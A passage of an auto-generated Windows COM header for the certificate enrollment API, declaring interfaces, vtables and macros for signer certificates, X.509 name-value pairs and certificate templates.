            /* [in] */ __RPC__in_opt ISignerCertificate *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ISignerCertificates * This);
        
        HRESULT ( STDMETHODCALLTYPE *Find )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCert,
            /* [retval][out] */ __RPC__out LONG *piSignerCert);
        
        END_INTERFACE
    } ISignerCertificatesVtbl;

    interface ISignerCertificates
    {
        CONST_VTBL struct ISignerCertificatesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISignerCertificates_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISignerCertificates_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISignerCertificates_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISignerCertificates_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISignerCertificates_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISignerCertificates_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISignerCertificates_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISignerCertificates_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ISignerCertificates_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ISignerCertificates_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ISignerCertificates_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ISignerCertificates_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ISignerCertificates_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ISignerCertificates_Find(This,pSignerCert,piSignerCert)	\
    ( (This)->lpVtbl -> Find(This,pSignerCert,piSignerCert) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISignerCertificates_INTERFACE_DEFINED__ */


#ifndef __IX509NameValuePair_INTERFACE_DEFINED__
#define __IX509NameValuePair_INTERFACE_DEFINED__

/* interface IX509NameValuePair */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509NameValuePair;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33f-217d-11da-b2a4-000e7bbb2b09")
    IX509NameValuePair : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strName,
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Value( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509NameValuePairVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509NameValuePair * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509NameValuePair * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509NameValuePair * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509NameValuePair * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Value )( 
            __RPC__in IX509NameValuePair * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IX509NameValuePair * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509NameValuePairVtbl;

    interface IX509NameValuePair
    {
        CONST_VTBL struct IX509NameValuePairVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509NameValuePair_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509NameValuePair_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509NameValuePair_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509NameValuePair_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509NameValuePair_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509NameValuePair_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509NameValuePair_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509NameValuePair_Initialize(This,strName,strValue)	\
    ( (This)->lpVtbl -> Initialize(This,strName,strValue) ) 

#define IX509NameValuePair_get_Value(This,pValue)	\
    ( (This)->lpVtbl -> get_Value(This,pValue) ) 

#define IX509NameValuePair_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509NameValuePair_INTERFACE_DEFINED__ */


#ifndef __IX509NameValuePairs_INTERFACE_DEFINED__
#define __IX509NameValuePairs_INTERFACE_DEFINED__

/* interface IX509NameValuePairs */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509NameValuePairs;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab340-217d-11da-b2a4-000e7bbb2b09")
    IX509NameValuePairs : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePair **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509NameValuePair *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509NameValuePairsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509NameValuePairs * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509NameValuePairs * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509NameValuePairs * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509NameValuePairs * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePair **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509NameValuePairs * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509NameValuePairs * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in_opt IX509NameValuePair *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509NameValuePairs * This);
        
        END_INTERFACE
    } IX509NameValuePairsVtbl;

    interface IX509NameValuePairs
    {
        CONST_VTBL struct IX509NameValuePairsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509NameValuePairs_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509NameValuePairs_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509NameValuePairs_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509NameValuePairs_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509NameValuePairs_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509NameValuePairs_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509NameValuePairs_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509NameValuePairs_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509NameValuePairs_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509NameValuePairs_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509NameValuePairs_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509NameValuePairs_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509NameValuePairs_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509NameValuePairs_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0064 */
/* [local] */ 

typedef 
enum EnrollmentTemplateProperty
    {	TemplatePropCommonName	= 1,
	TemplatePropFriendlyName	= ( TemplatePropCommonName + 1 ) ,
	TemplatePropEKUs	= ( TemplatePropFriendlyName + 1 ) ,
	TemplatePropCryptoProviders	= ( TemplatePropEKUs + 1 ) ,
	TemplatePropMajorRevision	= ( TemplatePropCryptoProviders + 1 ) ,
	TemplatePropDescription	= ( TemplatePropMajorRevision + 1 ) ,
	TemplatePropKeySpec	= ( TemplatePropDescription + 1 ) ,
	TemplatePropSchemaVersion	= ( TemplatePropKeySpec + 1 ) ,
	TemplatePropMinorRevision	= ( TemplatePropSchemaVersion + 1 ) ,
	TemplatePropRASignatureCount	= ( TemplatePropMinorRevision + 1 ) ,
	TemplatePropMinimumKeySize	= ( TemplatePropRASignatureCount + 1 ) ,
	TemplatePropOID	= ( TemplatePropMinimumKeySize + 1 ) ,
	TemplatePropSupersede	= ( TemplatePropOID + 1 ) ,
	TemplatePropRACertificatePolicies	= ( TemplatePropSupersede + 1 ) ,
	TemplatePropRAEKUs	= ( TemplatePropRACertificatePolicies + 1 ) ,
	TemplatePropCertificatePolicies	= ( TemplatePropRAEKUs + 1 ) ,
	TemplatePropV1ApplicationPolicy	= ( TemplatePropCertificatePolicies + 1 ) ,
	TemplatePropAsymmetricAlgorithm	= ( TemplatePropV1ApplicationPolicy + 1 ) ,
	TemplatePropKeySecurityDescriptor	= ( TemplatePropAsymmetricAlgorithm + 1 ) ,
	TemplatePropSymmetricAlgorithm	= ( TemplatePropKeySecurityDescriptor + 1 ) ,
	TemplatePropSymmetricKeyLength	= ( TemplatePropSymmetricAlgorithm + 1 ) ,
	TemplatePropHashAlgorithm	= ( TemplatePropSymmetricKeyLength + 1 ) ,
	TemplatePropKeyUsage	= ( TemplatePropHashAlgorithm + 1 ) ,
	TemplatePropEnrollmentFlags	= ( TemplatePropKeyUsage + 1 ) ,
	TemplatePropSubjectNameFlags	= ( TemplatePropEnrollmentFlags + 1 ) ,
	TemplatePropPrivateKeyFlags	= ( TemplatePropSubjectNameFlags + 1 ) ,
	TemplatePropGeneralFlags	= ( TemplatePropPrivateKeyFlags + 1 ) ,
	TemplatePropSecurityDescriptor	= ( TemplatePropGeneralFlags + 1 ) ,
	TemplatePropExtensions	= ( TemplatePropSecurityDescriptor + 1 ) ,
	TemplatePropValidityPeriod	= ( TemplatePropExtensions + 1 ) ,
	TemplatePropRenewalPeriod	= ( TemplatePropValidityPeriod + 1 ) 
    } 	EnrollmentTemplateProperty;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0064_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0064_v0_0_s_ifspec;

#ifndef __IX509CertificateTemplate_INTERFACE_DEFINED__
#define __IX509CertificateTemplate_INTERFACE_DEFINED__

/* interface IX509CertificateTemplate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("54244A13-555A-4e22-896D-1B0E52F76406")
    IX509CertificateTemplate : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplate * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        END_INTERFACE
    } IX509CertificateTemplateVtbl;

    interface IX509CertificateTemplate
    {
        CONST_VTBL struct IX509CertificateTemplateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplate_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplate_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateTemplates_INTERFACE_DEFINED__
#define __IX509CertificateTemplates_INTERFACE_DEFINED__

/* interface IX509CertificateTemplates */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplates;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79003-2181-11da-b2a4-000e7bbb2b09")
    IX509CertificateTemplates : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR bstrName,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOid( 
            /* [in] */ __RPC__in_opt IObjectId *pOid,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplatesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplates * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplates * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplates * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509CertificateTemplates * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in BSTR bstrName,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOid )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in_opt IObjectId *pOid,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        END_INTERFACE
    } IX509CertificateTemplatesVtbl;

    interface IX509CertificateTemplates
    {
        CONST_VTBL struct IX509CertificateTemplatesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplates_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplates_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplates_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplates_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplates_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplates_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplates_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplates_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509CertificateTemplates_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509CertificateTemplates_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509CertificateTemplates_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509CertificateTemplates_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509CertificateTemplates_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509CertificateTemplates_get_ItemByName(This,bstrName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,bstrName,ppValue) ) 

#define IX509CertificateTemplates_get_ItemByOid(This,pOid,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOid(This,pOid,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplates_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0066 */
/* [local] */ 

typedef 
enum CommitTemplateFlags
    {	CommitFlagSaveTemplateGenerateOID	= 1,
	CommitFlagSaveTemplateUseCurrentOID	= 2,
	CommitFlagSaveTemplateOverwrite	= 3,
	CommitFlagDeleteTemplate	= 4
    } 	CommitTemplateFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0066_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0066_v0_0_s_ifspec;

#ifndef __IX509CertificateTemplateWritable_INTERFACE_DEFINED__
#define __IX509CertificateTemplateWritable_INTERFACE_DEFINED__

